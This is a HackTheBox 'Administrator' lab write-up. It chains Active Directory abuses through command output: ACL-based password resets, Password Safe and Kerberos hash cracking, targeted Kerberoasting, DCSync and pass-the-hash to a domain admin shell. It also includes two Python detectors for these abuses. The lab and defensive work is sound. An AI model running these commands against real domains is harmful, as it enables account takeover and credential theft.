Dark_Man

HTB - Administrator


Last updated 5 months ago

Description


Administrator is a medium-difficulty machine that follows the assume-breach methodology: you start the machine with the credentials of a low-privileged user.

Enumeration


Nmap Scan

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan

PORT    STATE SERVICE
21/tcp  open  ftp
53/tcp  open  domain
88/tcp  open  kerberos-sec
135/tcp open  msrpc
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $nmap -p21,53,88,135,139,389,445 -sCV $ip -oN Nmap/script-scan

PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           Microsoft ftpd
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Active Directory LDAP (Domain: administrator.htb)
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time: 
|   date: 2024-11-10T04:07:40
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s

Summary

* Open ports: 21,53,88,135,139,389,445
* UDP open ports: 53,88,123,389
* Services: FTP - DNS - KERBEROS - RPC - SMB - LDAP
* Important notes: Domain: administrator.htb

hosts file

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $sudo sh -c "echo '10.10.11.42 dc administrator.htb DC.administrator.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $tail -n1 /etc/hosts
10.10.11.42 dc administrator.htb DC.administrator.htb

Foothold


I'm in the habit of looking for newly released tools and trying them out, so this time I will start my enumeration with cicada-mastertul.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $python3 cicada-mastertul.py -u Olivia -p ichliebedich -d Administrator.htb -t 10.10.11.42 --full



..snip..
[!x!] Scanning 10.10.11.42
[!] Enumerating SMB...
[-] Could not connect to SMB 
[!] Connecting to WinRM...
[-] Could not connect to WinRM 
[!] Enumerating Lookupsids using impacket...
[+] Lookupsids saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/lookupsid_results/lookupsid_file.txt
[+] Users list saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/lookupsid_results/users.txt
[!] Enumerating NPUsers using impacket...
[-] No NPUsers found
[!] Enumerating UserSPNs using impacket...
[-] No UserSPNs found
[!] Collecting Bloodhound Files...
[+] Bloodhound saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/bloodhound_results
[!] Enumerating LDAP...
[+] LDAP saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/ldap_results

After collecting data with BloodHound and ldapdomaindump, I will look through the domain for possible escalation paths.

  • Looking at BloodHound CE, user Olivia has GenericAll on Michael, which means this account can:

    1. Assign fake SPN and perform targeted Kerberoast attack

    2. Reset the password of that user

    3. Perform Shadow Credentials (Need PKINIT authentication)

Michael, in turn, has ForceChangePassword on Benjamin.

To perform this attack completely from Linux, I will use the following commands

net rpc password "michael" 'P@ssw00rd!231!!!' -U "administrator.htb"/"Olivia"%'ichliebedich' -S dc.administrator.htb

net rpc password "benjamin" 'P@ssw00rd!555!!!' -U "administrator.htb"/"michael"%'P@ssw00rd!231!!!' -S dc.administrator.htb
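A defender-side view of the two resets above, as an added example that is not part of the original write-up: a reset by another account is recorded on the DC as Security event 4724, and a freshly reset account that immediately resets a third one is a strong signal. The event records, timestamps, field names and the `svc-helpdesk` allow-list are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample of Security event 4724 ("An attempt was made to reset an
# account's password") records; the times and svc-helpdesk/alice are made up.
EVENTS = [
    {"time": "2024-11-10T04:20:11", "subject": "olivia", "target": "michael"},
    {"time": "2024-11-10T04:21:40", "subject": "michael", "target": "benjamin"},
    {"time": "2024-11-10T09:02:00", "subject": "svc-helpdesk", "target": "alice"},
]

# Assumption: the only accounts expected to reset other users' passwords.
AUTHORIZED_RESETTERS = {"svc-helpdesk"}


def unauthorized_resets(events, allowed=AUTHORIZED_RESETTERS):
    """Return (subject, target) pairs where the resetter is not on the allow-list."""
    return [(e["subject"], e["target"]) for e in events
            if e["subject"].lower() not in allowed]


def find_reset_chains(events, window=timedelta(minutes=30)):
    """Return chains A -> B -> C where B resets C shortly after A reset B."""
    parsed = sorted((datetime.fromisoformat(e["time"]),
                     e["subject"].lower(), e["target"].lower()) for e in events)
    open_chains = {}  # last account in a chain -> (time of last reset, chain)
    finished = []
    for when, subject, target in parsed:
        prev = open_chains.pop(subject, None)
        if prev and when - prev[0] <= window:
            chain = prev[1] + [target]       # the reset account acted in turn
        else:
            if prev:
                finished.append(prev[1])     # too old to count as one chain
            chain = [subject, target]
        if target in open_chains:            # target was reset before: close that chain
            finished.append(open_chains.pop(target)[1])
        open_chains[target] = (when, chain)
    finished.extend(chain for _, chain in open_chains.values())
    return [c for c in finished if len(c) >= 3]


if __name__ == "__main__":
    for chain in find_reset_chains(EVENTS):
        print("chained password resets:", " -> ".join(chain))
    for subject, target in unauthorized_resets(EVENTS):
        print(f"reset outside allow-list: {subject} reset {target}")
```
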

Now I have Benjamin's account, and he is a member of the Share Moderators group.

When I looked at the shares for juicy files, I didn't find anything useful

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $cat /tmp/nxc_hosted/nxc_spider_plus/10.10.11.42.json
{
    "NETLOGON": {},
    "SYSVOL": {
        "administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2024-10-30 17:22:19",
            "ctime_epoch": "2024-10-04 15:48:32",
            "mtime_epoch": "2024-10-30 17:22:19",
            "size": "23 B"
        },
        "administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2024-10-30 17:22:19",
            "ctime_epoch": "2024-10-04 15:48:32",
            "mtime_epoch": "2024-10-30 17:22:19",
            "size": "1.07 KB"
        },
        "administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2024-10-04 15:55:13",
            "ctime_epoch": "2024-10-04 15:55:13",
            "mtime_epoch": "2024-10-04 15:55:13",
            "size": "2.74 KB"
        },
        "administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2024-10-30 19:56:19",
            "ctime_epoch": "2024-10-04 15:48:32",
            "mtime_epoch": "2024-10-30 19:56:19",
            "size": "22 B"
        },
        "administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2024-10-30 17:22:53",
            "ctime_epoch": "2024-10-04 15:48:32",
            "mtime_epoch": "2024-10-30 17:22:53",
            "size": "4.16 KB"
        },
        "administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2024-10-30 19:56:19",
            "ctime_epoch": "2024-10-30 19:56:19",
            "mtime_epoch": "2024-10-30 19:56:19",
            "size": "184 B"
        },
        "administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/comment.cmtx": {
            "atime_epoch": "2024-10-30 19:56:19",
            "ctime_epoch": "2024-10-30 19:56:19",
            "mtime_epoch": "2024-10-30 19:56:19",
            "size": "553 B"
        }
    }
}

I will then move to FTP with the two new accounts I have, using FileZilla. Michael's account doesn't have any files, but Benjamin's does.

After downloading the file, I found that it is a Password Safe database, which is encrypted with a master password by default.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $file Backup.psafe3 
Backup.psafe3: Password Safe V3 database

I used pwsafe2john to extract the password hash of the database.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $pwsafe2john Backup.psafe3 > psafe3.hash

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $cat psafe3.hash 
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050

Using John the Ripper, I cracked this hash successfully.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $john psafe3.hash --wordlist=/usr/share/wordlists/rockyou.txt 

..snip..
tekieromucho     (Backu)

Then I downloaded Password Safe to my Windows machine, opened the database with it, and exported all the passwords to a .txt file.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $evil-winrm -i dc -u emily -p UXLCI5iETUsIBoFVxxxxxxxxxx

*Evil-WinRM* PS C:\Users\emily\Desktop> type user.txt
78a12ed55133ef7aa5b8xxxxxxxxxx

Privilege Escalation


  • User Emily has GenericWrite on Ethan, so she can do the following:

    1. Targeted Kerberoast attack

    2. Shadow Credentials

User Ethan has DCSync rights, so I can dump the NTDS database with this account.

Abuse GenericWrite privileges

/opt/targetedKerberoast/targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8xxxxxxxxx'
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $hashcat -m 13100 ethan.hash /usr/share/wordlists/rockyou.txt 

..snip..
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$8e4f007c95ee9cefd15d2a413649e2cb$..snip..:xxxxxxxxxx

Session..........: hashcat
Status...........: Cracked
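How this GenericWrite abuse looks in DC logs, as an added detection example that is not part of the original write-up: an SPN written to a user object by a different account (event 5136), followed within minutes by an RC4 (etype 0x17) service ticket request for that user (event 4769). The events are constructed and already normalized; the field names and the DN-to-account resolution are assumptions of this example.

```python
from datetime import datetime, timedelta

# Constructed, normalized DC Security events (field names are assumptions):
# 5136 = directory object modified, 4769 = Kerberos service ticket requested.
EVENTS = [
    {"id": 5136, "time": "2024-11-10T05:10:01", "actor": "emily", "account": "ethan",
     "attribute": "servicePrincipalName", "op": "add"},
    {"id": 4769, "time": "2024-11-10T05:10:02", "actor": "emily", "service": "ethan",
     "etype": "0x17"},
    {"id": 5136, "time": "2024-11-10T05:10:04", "actor": "emily", "account": "ethan",
     "attribute": "servicePrincipalName", "op": "delete"},
    {"id": 4769, "time": "2024-11-10T05:30:00", "actor": "olivia", "service": "DC$",
     "etype": "0x12"},
]

RC4_HMAC = "0x17"  # etype 23, i.e. the "$krb5tgs$23$" format hashcat -m 13100 takes


def _ts(event):
    return datetime.fromisoformat(event["time"])


def detect_targeted_kerberoast(events, window=timedelta(minutes=5)):
    """Correlate an SPN added by another account with an RC4 ticket for that user."""
    findings = []
    spn_changes = [e for e in events if e["id"] == 5136
                   and e["attribute"].lower() == "serviceprincipalname"]
    for add in (e for e in spn_changes if e["op"] == "add"):
        account = add["account"].lower()
        if add["actor"].lower() == account:
            continue  # an account editing its own SPN is a different case
        start, end = _ts(add), _ts(add) + window
        tickets = [e for e in events if e["id"] == 4769
                   and e["service"].lower() == account
                   and e["etype"].lower() == RC4_HMAC and start <= _ts(e) <= end]
        if not tickets:
            continue
        # An SPN that is removed again right after the request strengthens the finding.
        removed = any(e["op"] == "delete" and e["account"].lower() == account
                      and start <= _ts(e) <= end for e in spn_changes)
        findings.append({"account": account, "spn_set_by": add["actor"],
                         "requested_by": sorted({t["actor"] for t in tickets}),
                         "spn_removed_again": removed})
    return findings


if __name__ == "__main__":
    for finding in detect_targeted_kerberoast(EVENTS):
        print("possible targeted Kerberoast:", finding)
```
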

Dump administrator hash

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $evil-winrm -i dc -u administrator -H 3dc553ce4b9fd20bd01xxxxxxxxxxx

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
b42e8a0a9a5c81e4b7f8xxxxxxxxxxxxx

Root Flag: b42e8a0a9a5c81e4b7f8xxxxxxxxxxxxx
